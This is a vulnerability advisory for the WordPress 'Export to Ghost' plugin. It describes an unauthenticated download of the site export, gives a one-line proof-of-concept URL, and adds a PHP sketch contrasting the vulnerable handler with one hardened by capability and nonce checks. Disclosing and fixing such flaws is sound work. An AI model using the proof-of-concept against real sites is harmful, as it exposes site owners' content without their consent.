# Exploit Title: WordPress Export to Ghost Unrestricted Export Download
# Date: 28-04-2016
# Software Link: https://wordpress.org/plugins/ghost
# Exploit Author: Josh Brody
# Contact: http://twitter.com/joshmn
# Website: http://josh.mn/
# Category: webapps

1. Description

Any unauthenticated visitor can download the Ghost export file (the site's content in Ghost's import format) because the export handler never checks that the request comes from a logged-in administrator. The result is an unauthenticated disclosure of the site's exported content. Assume all versions below 0.5.6 are vulnerable.
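
The sketch below is an added illustration, not the plugin's own code (the advisory does not reproduce it). It contrasts the class of bug described above with a hardened handler. The function names and the `ghost_build_export()` helper are hypothetical, and the vulnerable variant is assumed to be hooked on `init`, which WordPress fires while loading wp-load.php, before wp-admin/admin.php calls `auth_redirect()`; that is one way a request to a `/wp-admin/` URL can be answered without any login.

```php
<?php
/*
 * Added illustration, not the Export to Ghost plugin's code.
 * Hypothetical names: ghost_export_handler_vulnerable(),
 * ghost_export_handler_fixed(), ghost_export_link(),
 * ghost_send_export_file() and the assumed ghost_build_export() helper.
 */

// Vulnerable pattern (assumed): the handler runs on 'init', which fires
// before wp-admin/admin.php reaches auth_redirect(), and it never asks who
// is making the request. Any GET /wp-admin/tools.php?ghostexport=true is
// answered with the export file.
function ghost_export_handler_vulnerable() {
    if ( empty( $_GET['ghostexport'] ) ) {
        return;
    }
    ghost_send_export_file();
}
// add_action( 'init', 'ghost_export_handler_vulnerable' );

// Hardened pattern: hook on 'admin_init' (which fires only after
// auth_redirect() has already sent anonymous users to wp-login.php),
// then explicitly require a user with the 'export' capability and a
// valid nonce for this action before sending anything.
function ghost_export_handler_fixed() {
    if ( empty( $_GET['ghostexport'] ) ) {
        return;
    }

    // Capability check: 'export' is the core capability behind Tools > Export;
    // on a default install only administrators hold it.
    if ( ! is_user_logged_in() || ! current_user_can( 'export' ) ) {
        wp_die(
            'You are not allowed to export this site.',
            '',
            array( 'response' => 403 )
        );
    }

    // CSRF check: the link must carry a _wpnonce generated for 'ghost_export';
    // check_admin_referer() dies with a 403 page on a missing or stale nonce,
    // so an attacker cannot make a logged-in admin trigger the export for them.
    check_admin_referer( 'ghost_export' );

    ghost_send_export_file();
}
add_action( 'admin_init', 'ghost_export_handler_fixed' );

// Download link rendered on the Tools screen. wp_nonce_url() appends the
// _wpnonce query parameter that check_admin_referer() validates above.
function ghost_export_link() {
    return wp_nonce_url( admin_url( 'tools.php?ghostexport=true' ), 'ghost_export' );
}

// Streams the export and stops further processing so WordPress does not
// append the admin page HTML to the file.
function ghost_send_export_file() {
    $json = ghost_build_export(); // assumed helper: serializes posts to Ghost JSON
    nocache_headers();
    header( 'Content-Type: application/json; charset=utf-8' );
    header( 'Content-Disposition: attachment; filename="ghost-export.json"' );
    echo $json;
    exit;
}
```

Note that with the hardened handler the proof-of-concept URL from this advisory fails even for a logged-in administrator, because it carries no `_wpnonce`; the Tools screen has to emit the link through `ghost_export_link()` (or any `wp_nonce_url()` call with the same action) for the download to work.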

2. Proof of Concept

http://example.com/wp-admin/tools.php?ghostexport=true&submit=Download+Ghost+file

Request this URL with no WordPress session cookie (a fresh private browser window or a plain HTTP client). On a vulnerable install the export file is served as a download with no login prompt.

3. Solution:

Update to version 0.5.6

https://downloads.wordpress.org/plugin/ghost.0.5.6.zip